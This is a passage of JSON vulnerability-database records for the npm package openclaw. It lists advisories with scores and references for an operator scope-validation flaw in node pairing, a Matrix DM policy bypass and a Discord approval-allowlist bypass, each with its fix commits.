                        {
                            "vulnerability": "VCID-xryt-a83q-q7et"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-xvhd-w4tv-tqhr"
                        },
                        {
                            "vulnerability": "VCID-xz8s-hj5s-wfgj"
                        },
                        {
                            "vulnerability": "VCID-xzg5-ren5-p7gw"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ykwt-tdpa-3bft"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-ynup-4v9e-tbh4"
                        },
                        {
                            "vulnerability": "VCID-yp2w-pc58-9bf6"
                        },
                        {
                            "vulnerability": "VCID-ywrn-52gx-f3ad"
                        },
                        {
                            "vulnerability": "VCID-z7wa-tw2t-vqas"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zac2-wjyt-27af"
                        },
                        {
                            "vulnerability": "VCID-zb5t-hhkm-kfeh"
                        },
                        {
                            "vulnerability": "VCID-zf3q-78js-k7ce"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zkum-rn42-yyfs"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22"
                }
            ],
            "aliases": [
                "GHSA-ppwq-6v66-5m6j"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-twsq-vfde-4fbf"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89807?format=api",
            "vulnerability_id": "VCID-u1ru-vdfp-x3hu",
            "summary": "OpenClaw: node.pair.approve missing callerScopes validation allows low-privilege operator to approve malicious nodes\n## Summary\n\nThe node pairing approval path did not consistently enforce that the approving caller already held every scope requested by the node.\n\n## Impact\n\nA lower-privileged operator could approve a pending node request for broader scopes and extend privileges onto the paired node.\n\n## Affected Component\n\n`src/infra/node-pairing.ts, src/gateway/server-methods/nodes.ts`\n\n## Fixed Versions\n\n- Affected: `<= 2026.3.24`\n- Patched: `>= 2026.3.28`\n- Latest stable `2026.3.28` contains the fix.\n\n## Fix\n\nFixed by commit `4d7cc6bb4f` (`gateway: restrict node pairing approvals`).\n\nOpenClaw thanks @AntAISecurityLab for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-33577",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00013",
                            "scoring_system": "epss",
                            "scoring_elements": "0.02402",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00013",
                            "scoring_system": "epss",
                            "scoring_elements": "0.02398",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00015",
                            "scoring_system": "epss",
                            "scoring_elements": "0.03525",
                            "published_at": "2026-06-07T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-33577"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "4.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:U"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/4d7cc6bb4fac68b5a5fadd1c5a23168281221f34",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N"
                        },
                        {
                            "value": "9.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "4.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:U"
                        },
                        {
                            "value": "8.6",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-01T03:55:41Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/4d7cc6bb4fac68b5a5fadd1c5a23168281221f34"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-2x4x-cc5g-qmmg",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N"
                        },
                        {
                            "value": "9.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "4.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:U"
                        },
                        {
                            "value": "8.6",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-01T03:55:41Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-2x4x-cc5g-qmmg"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33577",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "4.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:U"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33577"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-insufficient-scope-validation-in-node-pair-approve",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N"
                        },
                        {
                            "value": "9.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "4.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:U"
                        },
                        {
                            "value": "8.6",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-01T03:55:41Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-insufficient-scope-validation-in-node-pair-approve"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-2x4x-cc5g-qmmg",
                    "reference_id": "GHSA-2x4x-cc5g-qmmg",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-2x4x-cc5g-qmmg"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109863?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.28",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1j3m-fecr-f7cn"
                        },
                        {
                            "vulnerability": "VCID-1p5p-eth5-3ufu"
                        },
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-26kp-dbu2-pqej"
                        },
                        {
                            "vulnerability": "VCID-26sg-e29u-hkf3"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-2uqu-k42d-1baq"
                        },
                        {
                            "vulnerability": "VCID-2wr9-h42m-a7ev"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-38g8-39ek-xbat"
                        },
                        {
                            "vulnerability": "VCID-3wsw-d4z2-dydt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-3zx4-t8cj-kbfn"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4hz5-f2pw-3yb4"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-5rgx-2krs-guck"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7dyw-9b37-yqh4"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7wmr-v7zb-6fc9"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-9xrt-mv81-3yc8"
                        },
                        {
                            "vulnerability": "VCID-a2wx-7b8h-c3h1"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-axp9-mt9z-gkgw"
                        },
                        {
                            "vulnerability": "VCID-b9w3-w2nq-cqg6"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-c4yt-z48z-zygv"
                        },
                        {
                            "vulnerability": "VCID-c76v-4577-n7c6"
                        },
                        {
                            "vulnerability": "VCID-carm-gpgh-wbbf"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-cvmw-sxfq-dyhz"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-da47-zdf1-mfgf"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fekn-d6f3-xfa6"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-g3hg-peh1-tudm"
                        },
                        {
                            "vulnerability": "VCID-g8r6-x6s5-uydq"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hd4w-s3dp-nubj"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-j8fb-fhyc-33fu"
                        },
                        {
                            "vulnerability": "VCID-jdqk-kv8u-xqa9"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-kzgh-7f6h-kfd1"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mcz5-wgu1-z7g7"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7me-4bzz-83cm"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-q9jf-srt4-fbcg"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-s3wz-3yzf-ybhz"
                        },
                        {
                            "vulnerability": "VCID-sja9-6t41-hud8"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-t991-75e7-ykdv"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-uy97-p1ex-y7df"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vktg-77tu-vycv"
                        },
                        {
                            "vulnerability": "VCID-vx5d-3d98-7kf3"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-watb-49vx-yub1"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wx44-n3fr-skah"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-x4hn-ygbg-mkep"
                        },
                        {
                            "vulnerability": "VCID-x794-wfnf-1ugf"
                        },
                        {
                            "vulnerability": "VCID-x7uw-s9a6-fybd"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xryt-a83q-q7et"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-xvhd-w4tv-tqhr"
                        },
                        {
                            "vulnerability": "VCID-xz8s-hj5s-wfgj"
                        },
                        {
                            "vulnerability": "VCID-xzg5-ren5-p7gw"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ykwt-tdpa-3bft"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-ynup-4v9e-tbh4"
                        },
                        {
                            "vulnerability": "VCID-yp2w-pc58-9bf6"
                        },
                        {
                            "vulnerability": "VCID-ywrn-52gx-f3ad"
                        },
                        {
                            "vulnerability": "VCID-z7wa-tw2t-vqas"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zb5t-hhkm-kfeh"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zkum-rn42-yyfs"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"
                }
            ],
            "aliases": [
                "CVE-2026-33577",
                "GHSA-2x4x-cc5g-qmmg"
            ],
            "risk_score": 4.4,
            "exploitability": "0.5",
            "weighted_severity": "8.8",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-u1ru-vdfp-x3hu"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90842?format=api",
            "vulnerability_id": "VCID-u6hw-ffpj-4yd9",
            "summary": "OpenClaw: Matrix Verification Notices Bypass Matrix DM Policy and Reply to Unpaired DM Peers\n## Summary\n\nMatrix Verification Notices Bypass Matrix DM Policy and Reply to Unpaired DM Peers\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Affected versions: `<= 2026.3.24`\n- First patched version: `2026.3.25`\n- Latest published npm version at verification time: `2026.3.24`\n\n## Details\n\nMatrix verification notices previously bypassed DM access checks and could reply to peers that were unpaired or otherwise outside the allowed DM policy. Commit `2383daf5c4a4e08d9553e0e949552ad755ef9ec2` gates verification notices on DM access before sending.\n\nVerified vulnerable on tag `v2026.3.24` and fixed on `main` by commit `2383daf5c4a4e08d9553e0e949552ad755ef9ec2`.\n\n## Fix Commit(s)\n\n- `2383daf5c4a4e08d9553e0e949552ad755ef9ec2`",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35647",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.0004",
                            "scoring_system": "epss",
                            "scoring_elements": "0.12423",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.0004",
                            "scoring_system": "epss",
                            "scoring_elements": "0.12387",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.0004",
                            "scoring_system": "epss",
                            "scoring_elements": "0.12424",
                            "published_at": "2026-06-06T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35647"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/2383daf5c4a4e08d9553e0e949552ad755ef9ec2",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-10T17:21:05Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/2383daf5c4a4e08d9553e0e949552ad755ef9ec2"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-9wqx-g2cw-vc7r",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-10T17:21:05Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-9wqx-g2cw-vc7r"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35647",
                    "reference_id": "CVE-2026-35647",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35647"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-9wqx-g2cw-vc7r",
                    "reference_id": "GHSA-9wqx-g2cw-vc7r",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-9wqx-g2cw-vc7r"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-direct-message-policy-bypass-via-verification-notices",
                    "reference_id": "openclaw-direct-message-policy-bypass-via-verification-notices",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-10T17:21:05Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-direct-message-policy-bypass-via-verification-notices"
                }
            ],
            "fixed_packages": [],
            "aliases": [
                "CVE-2026-35647",
                "GHSA-9wqx-g2cw-vc7r"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-u6hw-ffpj-4yd9"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91801?format=api",
            "vulnerability_id": "VCID-u9cw-crg5-1kbs",
            "summary": "OpenClaw: Discord text `/approve` bypasses `channels.discord.execApprovals.approvers` and allows non-approvers to resolve pending exec approvals\n## Summary\n\nDiscord text approval commands resolved pending exec approvals without honoring the configured approver allowlist.\n\n## Impact\n\nA Discord user who was allowed to send commands but was not in the approver list could still approve pending host execution.\n\n## Affected Component\n\n`extensions/discord/src/exec-approvals.ts, src/auto-reply/reply/commands-approve.ts`\n\n## Fixed Versions\n\n- Affected: `<= 2026.3.24`\n- Patched: `>= 2026.3.28`\n- Latest stable `2026.3.28` contains the fix.\n\n## Fix\n\nFixed by commit `355abe5eba` (`Discord: enforce approver checks for text approvals`).",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41303",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00079",
                            "scoring_system": "epss",
                            "scoring_elements": "0.23525",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00079",
                            "scoring_system": "epss",
                            "scoring_elements": "0.23462",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00079",
                            "scoring_system": "epss",
                            "scoring_elements": "0.23509",
                            "published_at": "2026-06-06T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41303"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv4",
